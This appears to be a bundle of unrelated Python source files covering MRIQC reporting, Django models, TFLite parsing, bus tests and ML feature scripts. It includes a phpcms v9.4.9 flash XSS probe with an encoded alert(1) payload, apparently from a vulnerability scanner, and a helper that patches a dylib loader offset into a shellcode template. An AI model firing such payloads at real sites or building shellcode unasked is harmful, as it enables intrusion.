            # Number of initial non-steady-state volumes dropped upstream.
            bold_exclude_index = in_iqms.get('dumb_trs')
            if bold_exclude_index is None:
                report_log.warning('Building bold report: no exclude index was found')
            elif bold_exclude_index > 0:
                msg = """\
<span class="problematic">Non-steady state (strong T1 contrast) has been detected in the \
first {} volumes</span>. They were excluded before generating any QC measures and plots."""
                wf_details.append(msg.format(bold_exclude_index))
            # NOTE(review): sett_dict may be None here if 'settings' was
            # missing from provenance -- .pop would then raise. Confirm
            # bold inputs always carry settings.
            hmc_fsl = sett_dict.pop('hmc_fsl')
            if hmc_fsl is not None:
                msg = 'Framewise Displacement was computed using '
                if hmc_fsl:
                    msg += 'FSL <code>mcflirt</code>'
                else:
                    msg += 'AFNI <code>3dvolreg</code>'
                wf_details.append(msg)
            fd_thres = sett_dict.pop('fd_thres')
            if fd_thres is not None:
                wf_details.append(
                    'Framewise Displacement threshold was defined at %f mm' % fd_thres)
        elif modality in ('T1w', 'T2w'):
            # NOTE(review): warn_dict may likewise be None for anatomical
            # inputs without a 'warnings' entry -- TODO confirm.
            if warn_dict.pop('small_air_mask', False):
                wf_details.append(
                    '<span class="problematic">Detected hat mask was too small</span>')
            if warn_dict.pop('large_rot_frame', False):
                wf_details.append(
                    '<span class="problematic">Detected a zero-filled frame, has the original '
                    'image been rotated?</span>')
        return in_prov, wf_details, sett_dict

    in_iqms = Path(in_iqms)
    with in_iqms.open() as jsonfile:
        iqms_dict = load(jsonfile)
    # Now, the in_iqms file should be correctly named: the HTML output takes
    # its basename with an .html suffix, resolved in the current directory.
    out_file = str(Path(in_iqms.with_suffix(".html").name).resolve())
    # Extract and prune metadata
    # NOTE(review): if 'bids_meta' is absent, metadata is None and the
    # .pop() on the next line raises AttributeError -- confirm inputs
    # always include bids_meta.
    metadata = iqms_dict.pop('bids_meta', None)
    mod = metadata.pop('modality', None)
    prov, wf_details, _ = _get_details(iqms_dict, mod)
    # Keep only the BIDS entity values present in the metadata, in order.
    file_id = [metadata.pop(k, None)
               for k in list(BIDS_COMP.keys())]
    file_id = [comp for comp in file_id if comp is not None]
    if in_plots is None:
        in_plots = []
    else:
        # Optional reportlets extend the section titles for BOLD reports.
        if any(('melodic_reportlet' in k for k in in_plots)):
            REPORT_TITLES['bold'].insert(3, ('ICA components', 'ica-comps'))
        if any(('plot_spikes' in k for k in in_plots)):
            REPORT_TITLES['bold'].insert(3, ('Spikes', 'spikes'))
        # Pair each (title, anchor) with the inlined snippet contents.
        in_plots = [(REPORT_TITLES[mod][i] + (read_report_snippet(v), ))
                    for i, v in enumerate(in_plots)]
    pred_qa = None  # metadata.pop('mriqc_pred', None)
    # Template context for the individual-report HTML.
    config = {
        'modality': mod,
        'dataset': metadata.pop('dataset', None),
        'bids_name': in_iqms.with_suffix("").name,
        'timestamp': datetime.datetime.now().strftime("%Y-%m-%d, %H:%M"),
        'version': ver,
        'imparams': iqms2html(iqms_dict, 'iqms-table'),
        'svg_files': in_plots,
        'workflow_details': wf_details,
        'webapi_url': prov.pop('webapi_url'),
        'webapi_port': prov.pop('webapi_port'),
        'provenance': iqms2html(prov, 'provenance-table'),
        'md5sum': prov['md5sum'],
        'metadata': iqms2html(metadata, 'metadata-table'),
        'pred_qa': pred_qa
    }
    if config['metadata'] is None:
        config['workflow_details'].append(
            '<span class="warning">File has no metadata</span> '
            '<span>(sidecar JSON file missing or empty)</span>')
    tpl = IndividualTemplate()
    tpl.generate_conf(config, out_file)
    report_log.info('Generated individual log (%s)', out_file)
    return out_file
|
from django.conf import settings
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class BaseVerification(models.Model):
    """Abstract base for verification models: who is verified, how, and when."""
    user = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        related_name="%(app_label)s_%(class)s_related",
        related_query_name="%(app_label)s_%(class)ss",
    )
    # Kind of verification being performed (e.g. by email or phone).
    verification_type = models.CharField(
        max_length=128,
    )
    # Placeholder: concrete subclasses override this with a real field.
    verification_code = None
    # BUG FIX: `created` previously used auto_now=True (plus the internal-only
    # auto_created flag), which re-stamps the field on EVERY save.  A creation
    # timestamp must use auto_now_add=True so it is set once on insert.
    created = models.DateTimeField(
        auto_now_add=True,
    )
    # Updated on every save.
    updated = models.DateTimeField(
        auto_now=True,
    )

    class Meta:
        abstract = True
        ordering = ['created']
class Verification(BaseVerification):
    # Active verification challenge; the code is globally unique so it can be
    # looked up on its own.
    verification_code = models.CharField(
        max_length=32,
        unique=True,
    )
    class Meta:
        # At most one pending verification per (user, type) pair.
        unique_together = ['user', 'verification_type']
        ordering = ['-created']
class VerificationRecord(BaseVerification):
    # Historical record of a verification attempt; codes are NOT unique here,
    # unlike Verification.verification_code.
    verification_code = models.CharField(
        max_length=32,
    )
    # Whether this attempt ultimately succeeded.
    is_verified = models.BooleanField(
        default=False,
    )
    class Meta:
        ordering = ['-created']
|
#coding:utf-8
###################################################################
# File Name: setting.py
# Author: Meng Zhao
# mail: @
# Created Time: Wed 21 Mar 2018 04:50:40 PM CST
#=============================================================
import os
import logging
import logging.handlers
import tensorflow as tf
#version
SERVER_NAME = 'ner'
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
DATA_DIR = BASE_DIR + '/data'
#MODEL_DIR = BASE_DIR + '/example/runs/' + SERVER_NAME
MODEL_DIR = BASE_DIR + '/output'
#bert server
# Ports of the TensorFlow Serving instance hosting the (AL)BERT model.
TF_SERVING_REST_PORT = 16378
TF_SERVING_CLIENT_PORT = 16379
# NOTE(review): "SIGNATRUE" is a typo for "SIGNATURE"; the constant name is
# kept as-is because other modules may import it by this exact name.
TF_SERVING_SIGNATRUE_NAME = 'predict_text'
#files path
#STOPWORD_FILE = DATA_DIR + '/stopword_data/stop_words'
STOPWORD_FILE = DATA_DIR + '/stopword_data/stop_symbol'
LABEL_FILE = MODEL_DIR + '/labels.tsv'
LABEL_MAP_FILE = MODEL_DIR + '/label_map'
VOCAB_FILE = MODEL_DIR + '/vocab.txt'
BERT_CONFIG_FILE = MODEL_DIR + '/albert_config.json'
CHECKPOINT_DIR = MODEL_DIR + '/checkpoints'
LOG_DIR = BASE_DIR + '/log/'
# Create the log directory on first import (check-then-create is racy but
# harmless for a single-process server start).
if not os.path.exists(LOG_DIR):
    os.makedirs(LOG_DIR)
# Log to stderr via basicConfig and to a daily-rotated file keeping 10 backups.
LOG_FORMAT = '%(asctime)s - %(levelname)s - [%(lineno)s]%(filename)s - %(message)s'
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
log_handler = logging.handlers.TimedRotatingFileHandler(filename=LOG_DIR + 'ner.log', when='D', interval=1, backupCount=10)
log_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logging.getLogger('').addHandler(log_handler)
|
from cStringIO import StringIO
from PIL import Image
from icrawler.builtin import GoogleImageCrawler
from Craft import CraftClient
import time
import sys
import os
import win32clipboard
import win32com.client
import shutil
PATH_TO_CRAFT_SDK_FILE = "./"
sys.path.insert(0, PATH_TO_CRAFT_SDK_FILE)
pre_recv_data =''
recv_data = ''
pre_search_idx = 0
now_search_idx = 0
result_link = []
download_finish = False
start_download = False
counter = 0
shell = win32com.client.Dispatch("WScript.Shell")
def send_to_clipboard(clip_type, data):
    # Replace the current Windows clipboard contents with `data` stored under
    # the given clipboard format (e.g. win32clipboard.CF_DIB).
    win32clipboard.OpenClipboard()
    win32clipboard.EmptyClipboard()
    win32clipboard.SetClipboardData(clip_type, data)
    win32clipboard.CloseClipboard()
def recv_from_clipboard(clip_type):
    # Read the current Windows clipboard contents.
    # NOTE(review): `clip_type` is accepted but never passed to
    # GetClipboardData(), so the default clipboard format is returned;
    # callers that pass CF_DIB currently rely on this behaviour to get the
    # copied text back.
    win32clipboard.OpenClipboard()
    data = win32clipboard.GetClipboardData()
    win32clipboard.CloseClipboard()
    return data
def load_image(image_idx):
    # Paste the image identified by `image_idx` into the active window: find
    # the file under images/ (or images/google/ for downloads), copy it to
    # the clipboard as a bitmap, and send Ctrl+V.
    global shell
    filepath = ""
    if image_idx == "waiting":
        # Placeholder shown while the Google download is in progress.
        filepath = 'images/' + image_idx + '.jpg'
    else:
        # Downloaded files are named by zero-padded index with an unknown
        # extension, so match on the basename.
        for filename in os.listdir("./images/google"):
            #print "in download dir: " + filename
            if filename.split('.')[0] == image_idx:
                print "match the file!!!"
                if filename.endswith(".png"):
                    print('its extension is png')
                    filepath = 'images/google/' + image_idx + '.png'
                elif filename.endswith(".gif"):
                    print('its extension is gif')
                    filepath = 'images/google/' + image_idx + '.gif'
                else:
                    print('its extension is jpg')
                    filepath = 'images/google/' + image_idx + '.jpg'
                break
    # NOTE(review): if no file matched, filepath stays "" and Image.open fails.
    print "God damn sucking filepath :" + filepath + "\n"
    image = Image.open(filepath)
    # Render to an in-memory BMP; the first 14 bytes (BMP file header) are
    # stripped to produce CF_DIB clipboard data.
    output = StringIO()
    image.convert("RGB").save(output, "BMP")
    data = output.getvalue()[14:]
    output.close()
    send_to_clipboard(win32clipboard.CF_DIB, data)
    time.sleep(0.03)
    shell.SendKeys("^v")
def copy_word_and_download_image():
    # Copy the currently selected text, replace it with a "waiting" image,
    # then download up to 8 matching Google Image results (200x200..800x800)
    # into images/google/.
    global recv_data
    global shell
    shell.SendKeys("^c")
    time.sleep(0.05)
    # NOTE(review): CF_DIB is requested but recv_from_clipboard ignores its
    # argument and returns the default clipboard format (the copied text).
    recv_data = recv_from_clipboard(win32clipboard.CF_DIB)
    shell.SendKeys("{DELETE}")
    load_image('waiting')
    google_crawler = GoogleImageCrawler(
        downloader_threads=8,
        storage={'root_dir': 'images/google'}
    )
    google_crawler.crawl(
        str(recv_data) ,
        max_num=8,
        date_min=None,
        date_max=None,
        min_size=(200,200),
        max_size=(800,800))
def handleCraftEvent_chrome_gmail(event):
    # Craft crown handler for Chrome/Gmail: a right turn on a selected word
    # replaces it with a downloaded Google Image result; further turns cycle
    # through the results.  Uses {DELETE} to remove the previous image.
    # do tap
    global counter
    counter = 0
    global pre_search_idx
    global now_search_idx
    global download_finish
    global start_download
    global shell
    #print '\n\n' + str(event) + '\n\n'
    # do turn
    if (event['message_type'] == 'crown_turn_event'):
        #check tap first
        print 'in turn state\n'
        if event['delta'] < 0:
            # Turn left: step back one tick (10 ticks per image).
            if(now_search_idx > 10) and download_finish:
                now_search_idx -= 1
        elif event['delta'] > 0:
            if not download_finish and not start_download:
                # First right turn: grab the selected word and download images.
                start_download = True
                try:
                    copy_word_and_download_image()
                except:
                    # NOTE(review): bare except swallows every error and
                    # leaves start_download stuck at True.
                    return
                download_finish = True
                start_download = False
                now_search_idx = 10
                tmp = now_search_idx / 10
                shell.SendKeys("{DELETE}")
                load_image(str(tmp).zfill(6))
                pre_search_idx = tmp
            # Turn right: advance one tick (capped below image index 8).
            if(now_search_idx < 80) and download_finish:
                now_search_idx += 1
        # Image index = tick count / 10 (integer division under Python 2).
        tmp = now_search_idx / 10
        print 'search idx: %d\n' % tmp
        if(pre_search_idx != tmp) and download_finish:
            # Replace the previously pasted image with the new selection.
            shell.SendKeys("{DELETE}")
            load_image(str(tmp).zfill(6))
            pre_search_idx = tmp
    #else:
        #stopMoving()
def handleCraftEvent_ppt(event):
    # Craft crown handler for PowerPoint.  Near-duplicate of the Chrome/Gmail
    # handler; the only difference is that PowerPoint removes the pasted
    # image with {BACKSPACE} instead of {DELETE}.
    # do tap
    global counter
    counter = 0
    global pre_search_idx
    global now_search_idx
    global download_finish
    global start_download
    global shell
    #print '\n\n' + str(event) + '\n\n'
    # do turn
    if (event['message_type'] == 'crown_turn_event'):
        #check tap first
        print 'in turn state\n'
        if event['delta'] < 0:
            # Turn left: step back one tick (10 ticks per image).
            if(now_search_idx > 10) and download_finish:
                now_search_idx -= 1
        elif event['delta'] > 0:
            if not download_finish and not start_download:
                # First right turn: grab the selected word and download images.
                start_download = True
                try:
                    copy_word_and_download_image()
                except:
                    # NOTE(review): bare except swallows every error and
                    # leaves start_download stuck at True.
                    return
                download_finish = True
                start_download = False
                now_search_idx = 10
                tmp = now_search_idx / 10
                shell.SendKeys("{BACKSPACE}")
                load_image(str(tmp).zfill(6))
                pre_search_idx = tmp
            # Turn right: advance one tick (capped below image index 8).
            if(now_search_idx < 80) and download_finish:
                now_search_idx += 1
        # Image index = tick count / 10 (integer division under Python 2).
        tmp = now_search_idx / 10
        print 'search idx: %d\n' % tmp
        if(pre_search_idx != tmp) and download_finish:
            # Replace the previously pasted image with the new selection.
            shell.SendKeys("{BACKSPACE}")
            load_image(str(tmp).zfill(6))
            pre_search_idx = tmp
    #else:
        #stopMoving()
def handleCraftEvent_word(event):
    # Craft crown handler for MS Word.  Near-duplicate of the other handlers;
    # Word needs TWO {BACKSPACE} presses (with a short pause) to remove the
    # pasted inline image.
    # do tap
    global counter
    counter = 0
    global pre_search_idx
    global now_search_idx
    global download_finish
    global start_download
    global shell
    #print '\n\n' + str(event) + '\n\n'
    # do turn
    if (event['message_type'] == 'crown_turn_event'):
        #check tap first
        print 'in turn state\n'
        if event['delta'] < 0:
            # Turn left: step back one tick (10 ticks per image).
            if(now_search_idx > 10) and download_finish:
                now_search_idx -= 1
        elif event['delta'] > 0:
            if not download_finish and not start_download:
                # First right turn: grab the selected word and download images.
                start_download = True
                try:
                    copy_word_and_download_image()
                except:
                    # NOTE(review): bare except swallows every error and
                    # leaves start_download stuck at True.
                    return
                download_finish = True
                start_download = False
                now_search_idx = 10
                tmp = now_search_idx / 10
                shell.SendKeys("{BACKSPACE}")
                time.sleep(0.01)
                shell.SendKeys("{BACKSPACE}")
                load_image(str(tmp).zfill(6))
                pre_search_idx = tmp
            # Turn right: advance one tick (capped below image index 8).
            if(now_search_idx < 80) and download_finish:
                now_search_idx += 1
        # Image index = tick count / 10 (integer division under Python 2).
        tmp = now_search_idx / 10
        print 'search idx: %d\n' % tmp
        if(pre_search_idx != tmp) and download_finish:
            # Replace the previously pasted image with the new selection.
            shell.SendKeys("{BACKSPACE}")
            time.sleep(0.01)
            shell.SendKeys("{BACKSPACE}")
            load_image(str(tmp).zfill(6))
            pre_search_idx = tmp
    #else:
        #stopMoving()
# Register one Craft client per target application; each forwards crown
# events to the matching handler above.
craft_ppt = CraftClient()
# for windows
craft_ppt.connect("POWERPNT.EXE", "")
craft_ppt.registerEventHandler(handleCraftEvent_ppt)
craft_word = CraftClient()
# for windows
craft_word.connect("WINWORD.EXE", "")
craft_word.registerEventHandler(handleCraftEvent_word)
craft_chrome = CraftClient()
# for windows
craft_chrome.connect("chrome.exe", "")
craft_chrome.registerEventHandler(handleCraftEvent_chrome_gmail)
# Main loop: five seconds after a download completes, clear the downloaded
# images so the next word starts from an empty folder.
while(1):
    # NOTE(review): `global` at module scope is a no-op; `counter` is already
    # a module-level name.
    global counter
    time.sleep(1)
    if download_finish:
        counter+=1
        if counter==5 :
            download_finish = False
            folder = './images/google'
            for the_file in os.listdir(folder):
                file_path = os.path.join(folder, the_file)
                try:
                    if os.path.isfile(file_path):
                        print 'delete' + file_path
                        os.unlink(file_path)
                    #elif os.path.isdir(file_path): shutil.rmtree(file_path)
                except Exception as e:
                    print(e)
|
from subprocess import check_output

# Address of the exported `_load` symbol inside the payload dylib, parsed
# from the `nm` symbol table line "<hex addr> T _load".
loader_offset = int(check_output('nm -g payload/payload.dylib | grep "T _load"',
                                 shell=True).split()[0], 16)

# FIX: use context managers so file handles are closed deterministically
# (the original leaked the input handle via open(...).read()).
with open('shellcode.in.s') as f:
    inp = f.read()
# Substitute the symbol offset into the shellcode template and emit it.
outp = inp.replace('OFFSET_LOAD', hex(loader_offset))
with open('shellcode.s', 'w') as f:
    f.write(outp)
|
from cloud.permission import Permission, NeedPermission
# Define the input output format of the function.
# This information is used when creating the *SDK*.
info = {
    'input_format': {
        # When True, users with an '@system.com' address stay in the count.
        'count_system_user': 'bool'
    },
    'output_format': {
        'item': {
            'count': 'int'
        }
    },
    'description': 'Return count of all users'
}
@NeedPermission(Permission.Run.Auth.get_user_count)
def do(data, resource):
    """Return the number of users in the 'user' partition.

    Unless data['count_system_user'] is truthy, users whose email matches
    '@system.com' are subtracted from the total.
    """
    partition = 'user'
    count = resource.db_get_count(partition)
    if not data.get('count_system_user', False):
        # Page through every system user and subtract them from the total.
        query = [{
            'condition': 'in',
            'option': 'or',
            'field': 'email',
            'value': '@system.com'
        }]
        start_key = None
        while True:
            items, start_key = resource.db_query(partition, query, start_key, limit=10000)
            count -= len(items)
            if not start_key:
                break
    return {'item': {'count': count}}
|
import csv
import json


def parse_event(parsed):
    """Flatten one GitHub push-event dict into a single CSV row dict.

    Only the first commit of the event is used, mirroring the original
    behaviour.  Raises KeyError/IndexError on events with no commits or a
    malformed author email (no '@').
    """
    email = parsed["payload"]["commits"][0]["author"]["email"]
    return {
        "id": parsed["id"],
        "repository_name": parsed["repo"]["name"],
        "ref": parsed["payload"]["ref"],
        "author_email": email,
        # Everything after the first '@'.
        "author_domain": email.split("@")[1],
        "author_name": parsed["payload"]["commits"][0]["author"]["name"],
        "message": parsed["payload"]["commits"][0]["message"],
        "sha": parsed["payload"]["commits"][0]["sha"],
        "organisation_name": parsed["org"]["login"] if "org" in parsed else None,
        "created_at": parsed["created_at"],
    }


def main():
    """Read newline-delimited JSON events and write them out as a CSV."""
    data = []
    with open("data/commits.json") as f:
        for line in f:
            data.append(parse_event(json.loads(line)))
    # FIX: newline='' is required by the csv module; without it the writer
    # emits blank lines between rows on Windows.
    with open("data/commits.csv", "w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=data[0].keys())
        writer.writeheader()
        writer.writerows(data)


if __name__ == "__main__":
    main()
|
import json
from django.http import JsonResponse
from django.middleware.csrf import get_token
def get_csrf(request):
    """Ensure the CSRF cookie is set and expose the token in a header."""
    token = get_token(request)
    response = JsonResponse({'detail': 'CSRF cookie set'})
    # Clients read the token from this header for subsequent POSTs.
    response['X-CSRFToken'] = token
    return response
|
#!/usr/bin/env python
# Copyright (c) 2018 Samsung Electronics Co., Ltd. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import numpy
import flatbuffers
import tflite.Model
import tflite.SubGraph
import argparse
import graph_stats
from operator_parser import OperatorParser
from subgraph_printer import SubgraphPrinter
from model_saver import ModelSaver
class TFLiteModelFileParser(object):
    """Parses a tflite flatbuffer file and prints or saves its subgraphs."""

    def __init__(self, args):
        """Capture CLI options (verbosity, tensor/operator filters, saving)."""
        # Read flatbuffer file descriptor using argument
        self.tflite_file = args.input_file

        # Clamp print level into the supported range (0 ~ 1).
        self.print_level = min(max(args.verbose, 0), 1)

        # Tensor index list to print information (all tensors by default).
        self.print_all_tensor = True
        if args.tensor:
            self.print_all_tensor = False
            self.print_tensor_index = [int(t) for t in args.tensor]

        # Operator index list to print information (all operators by default).
        self.print_all_operator = True
        if args.operator:
            self.print_all_operator = False
            self.print_operator_index = [int(o) for o in args.operator]

        # Config option: save per-operator configuration instead of printing.
        # FIX: initialise save_config unconditionally so it is always defined.
        self.save = False
        self.save_config = False
        if args.config:
            self.save = True
            self.save_config = True
        if self.save:
            self.save_prefix = args.prefix

    def PrintModel(self, model_name, op_parser):
        """Print subgraph information honouring the configured filters."""
        printer = SubgraphPrinter(self.print_level, op_parser, model_name)
        if not self.print_all_tensor:
            printer.SetPrintSpecificTensors(self.print_tensor_index)
        if not self.print_all_operator:
            printer.SetPrintSpecificOperators(self.print_operator_index)
        printer.PrintInfo()

    def SaveModel(self, model_name, op_parser):
        """Save per-operator information using the configured prefix."""
        saver = ModelSaver(model_name, op_parser)
        if self.save_config:
            saver.SaveConfigInfo(self.save_prefix)

    def main(self):
        """Parse every subgraph of the model, then report aggregate stats."""
        # Generate Model: top structure of tflite model file
        buf = bytearray(self.tflite_file.read())
        tf_model = tflite.Model.Model.GetRootAsModel(buf, 0)
        stats = graph_stats.GraphStats()
        # Model file can have many models (subgraphs)
        for subgraph_index in range(tf_model.SubgraphsLength()):
            tf_subgraph = tf_model.Subgraphs(subgraph_index)
            model_name = "#{0} {1}".format(subgraph_index, tf_subgraph.Name())
            # 0th subgraph is main subgraph
            if subgraph_index == 0:
                model_name += " (MAIN)"
            # Parse Operators
            op_parser = OperatorParser(tf_model, tf_subgraph)
            op_parser.Parse()
            stats += graph_stats.CalcGraphStats(op_parser)
            if self.save:
                # save all of operators in this model
                self.SaveModel(model_name, op_parser)
            else:
                # print all of operators or requested objects
                self.PrintModel(model_name, op_parser)
        print('==== Model Stats ({} Subgraphs) ===='.format(tf_model.SubgraphsLength()))
        print('')
        graph_stats.PrintGraphStats(stats, self.print_level)
if __name__ == '__main__':
    # Command-line interface: build the argument parser, then hand the parsed
    # options straight to TFLiteModelFileParser.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("input_file",
                            type=argparse.FileType('rb'),
                            help="tflite file to read")
    arg_parser.add_argument('-v', '--verbose',
                            type=int,
                            default=1,
                            help="set print level (0~1, default: 1)")
    arg_parser.add_argument('-t', '--tensor',
                            nargs='*',
                            help="tensor ID to print information (default: all)")
    arg_parser.add_argument('-o', '--operator',
                            nargs='*',
                            help="operator ID to print information (default: all)")
    arg_parser.add_argument('-c', '--config',
                            action='store_true',
                            help="Save the configuration file per operator")
    arg_parser.add_argument('-p', '--prefix',
                            help="file prefix to be saved (with -c/--config option)")

    # Call main function
    TFLiteModelFileParser(arg_parser.parse_args()).main()
|
#!/usr/bin/env python
#coding = utf-8
import re,urllib,md5
def assign(service, arg):
    """Claim the target when the service is phpcms; implicitly None otherwise."""
    if service != "phpcms":
        return None
    return True, arg
def audit(arg):
    # Probe a phpcms installation for the v9.4.9 flashplayer XSS: player.swf
    # reflects the URL-encoded `stream` parameter into JavaScript.
    url = arg
    # MD5 of the response body that identifies the vulnerable player.swf.
    md5_check_value = 'cf00b069e36e756705c49b3a3bf20c40'
    payload = urllib.unquote("statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf%26stream%3D%5C%2522%29%29%7Dcatch%28e%29%7Balert%281%29%7D%2f%2f")
    # `curl` and `security_info` are injected by `from dummy import *` below.
    code, head, res, errcode, _ = curl.curl(url+payload)
    if code == 200:
        md5_buff = md5.new(res).hexdigest()
        # NOTE(review): `in` on two 32-char hex strings behaves like equality
        # here; `==` would state the intent more clearly.
        if md5_buff in md5_check_value:
            security_info(url + 'phpcms v9.4.9 flash xss')
if __name__ == '__main__':
    # `dummy` supplies the curl/security_info harness used by audit().
    from dummy import *
    audit(assign('phpcms', "http://www.phpcms.cn/")[1])
|
import asyncio
import logging
from asyncio import CancelledError
import pytest
import lightbus
import lightbus.path
from lightbus import EventMessage
from lightbus.utilities.async_tools import cancel
pytestmark = pytest.mark.reliability
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
async def test_random_failures(
    bus: lightbus.path.BusPath, new_bus, caplog, fire_dummy_events, dummy_api, mocker
):
    """Keep killing bus clients and check that we don't lose any events regardless."""
    caplog.set_level(logging.WARNING)
    # call id -> number of times the listener handled that event
    event_ok_ids = dict()
    history = []

    async def listener(event_message: EventMessage, field, **kwargs):
        # Record every delivery; the sleep makes it likely a listener is
        # mid-handling when its task is cancelled below, forcing redelivery.
        call_id = int(field)
        event_ok_ids.setdefault(call_id, 0)
        event_ok_ids[call_id] += 1
        await asyncio.sleep(0.03)

    # Put a lot of events onto the bus (we'll pull them off shortly)
    bus.client.register_api(dummy_api)
    for n in range(0, 100):
        await bus.my.dummy.my_event.fire_async(field=str(n))
    # Now pull the events off, and sometimes kill a worker early
    for n in range(0, 120):
        cursed_bus: lightbus.path.BusPath = new_bus(service_name="test")
        # "since: 0" makes every fresh client re-read the stream from the
        # beginning, picking up events earlier clients failed to acknowledge.
        cursed_bus.my.dummy.my_event.listen(
            listener, listener_name="test", bus_options={"since": "0"}
        )
        await cursed_bus.client._setup_server()
        await asyncio.sleep(0.02)
        if n % 5 == 0:
            # Cancel 1 in every 5 attempts at handling the event
            cursed_bus.client._event_listeners[0].listener_task.cancel()
        await asyncio.sleep(0.05)
        await cursed_bus.client.close_async()
    # At-least-once delivery: every event seen, and the deliberate
    # cancellations must have produced at least one redelivery.
    duplicate_calls = [n for n, v in event_ok_ids.items() if v > 1]
    assert len(event_ok_ids) == 100
    assert len(duplicate_calls) > 0
|
import os
import collections
import pandas
import matplotlib, seaborn, numpy
from matplotlib import pyplot
import sklearn
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import Pipeline
from sklearn.linear_model import SGDClassifier, LogisticRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import cross_val_score
import nsp2_interface
def count_aa(string):
    """Return per-residue counts (case-insensitive) for the 20 standard amino acids."""
    amino_acids = ['H', 'E', 'V', 'A', 'N', 'M', 'K', 'F', 'I', 'P', 'D', 'R', 'Y', 'T', 'S', 'W', 'G', 'C', 'L', 'Q']
    lowered = string.lower()
    return [lowered.count(aa.lower()) for aa in amino_acids]
def count_attribute(string, attribute):
    """Count residues in `string` belonging to a chemical attribute class.

    Parameters
    ----------
    string : str
        Amino-acid sequence; matching is case-insensitive.
    attribute : str
        One of "charged", "polar" or "nonpolar".

    Returns
    -------
    int
        Total number of residues in the requested class.

    Raises
    ------
    ValueError
        If `attribute` is not a known class (now with a message; the
        original raised a bare ValueError()).
    """
    groups = {
        "charged": ['R', 'K', 'D', 'E'],
        "polar": ['Q', 'N', 'H', 'S', 'T', 'Y', 'C', 'W'],
        "nonpolar": ['A', 'I', 'L', 'M', 'F', 'V', 'P', 'G'],
    }
    try:
        aa_list = groups[attribute]
    except KeyError:
        raise ValueError("unknown attribute: {!r}".format(attribute))
    lowered = string.lower()
    return sum(lowered.count(aa.lower()) for aa in aa_list)
nsp2 = nsp2_interface.NSP2()
df = pandas.read_csv("{}/data/train.20171126.csv".format(os.path.dirname(os.path.realpath(__file__))))
# Binarise the target: ratio above 0.5 counts as a positive example.
df["binary_label"] = df.ratio > 0.5
# Grouped CV by protein accession so windows of one protein stay in one fold.
cross_val_score_args = {'cv': 5, 'n_jobs': -1, "scoring": "roc_auc", "groups": df.uniprot_accession.values}
scores = collections.OrderedDict()
print(len(df["sequence_aa"]))
print(len(df["uniprot_accession"]))
print(list(df))
sequences = df["sequence_aa"]
# Three feature sets to compare: amino-acid counts, NSP2 features, and both.
just_amino_acids = []
just_nsp2_features = []
combined = []
for num in range(len(sequences)):
#for num in range(10):
    # id format: "...|<uniprot accession>|<start>-<end>" -- TODO confirm.
    uniprot_id = df['id'][num].split("|")[1]
    start = int(df['id'][num].split("|")[2].split("-")[0])
    end = int(df['id'][num].split("|")[2].split("-")[1])
    num_aa = count_aa(df["sequence_aa"][num])
    just_amino_acids.append(num_aa)
    #print("{}, {}".format(start, end))
    nsp2_features = nsp2.get_summed_attributes_vector(uniprot_id, start, end)
    just_nsp2_features.append(nsp2_features)
    combined_vector = num_aa + nsp2_features
    #print(final_vector)
    combined.append(combined_vector)
# NOTE(review): the next two lines duplicate the identical assignments above.
cross_val_score_args = {'cv': 5, 'n_jobs': -1, "scoring": "roc_auc", "groups": df.uniprot_accession.values}
scores = collections.OrderedDict()
score = cross_val_score(
    LogisticRegression(),
    just_amino_acids,
    df.binary_label, #y
    **cross_val_score_args)
# NOTE(review): all three results are stored under the same key, so `scores`
# only retains the last ("Combined") result.
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Just Amino Acids")
print(score)
print(numpy.mean(score))
print("")
score = cross_val_score(
    LogisticRegression(),
    just_nsp2_features,
    df.binary_label, #y
    **cross_val_score_args)
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Just NSP2")
print(score)
print(numpy.mean(score))
print("")
score = cross_val_score(
    LogisticRegression(),
    combined,
    df.binary_label, #y
    **cross_val_score_args)
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Combined")
print(score)
print(numpy.mean(score))
#sequences, classification = parse_bepipred.get_bepipred_data()
"""
for num in range(len(df["sequence_aa"])):
    print(df["sequence_aa"][num])
    print(df["binary_label"][num])
"""
#for seq in df["sequence_aa"]:
#    print(seq)
#!/usr/bin/env python
import os
import responses
import unittest
import shutil
from pydub import AudioSegment
from datetime import datetime
from typecaster import utils
import xml.etree.ElementTree as ET
class Object(object):
    # Minimal attribute bag used to build fake podcast/episode fixtures.
    pass
def catch_requests():
    # Catch synthesize requests and insert test .wav file as response
    # (must be called inside a @responses.activate-decorated test).
    with open("tests/test_files/test.wav", "rb") as test:
        test_response = test.read()
    responses.add(responses.GET, 'https://stream.watsonplatform.net/text-to-speech/api/v1/synthesize',
                  body=test_response, status=200)
class TestUtils(unittest.TestCase):
    """Tests for typecaster.utils against canned Watson TTS responses."""

    def setUp(self):
        # Build a minimal fake podcast object graph with one episode, and load
        # the expected RSS feed fixture (whitespace-stripped for comparison).
        self.podcast = Object()
        self.podcast.title = 'Test Podcast'
        self.podcast.link = 'http://test.com'
        self.podcast.author = 'Test Author'
        self.podcast.description = 'This is a test podcast'
        self.podcast.output_path = '.test_utils'
        self.podcast.language = 'en-us'
        self.podcast.subtitle = None
        self.podcast.owner_name = None
        self.podcast.owner_email = None
        self.podcast.image = None
        self.podcast.categories = ['News', 'Sports']
        self.podcast.copyright = None
        self.podcast.episodes = {}
        self.podcast.episodes['Test Episode 1'] = Object()
        self.podcast.episodes['Test Episode 1'].text = 'hello'
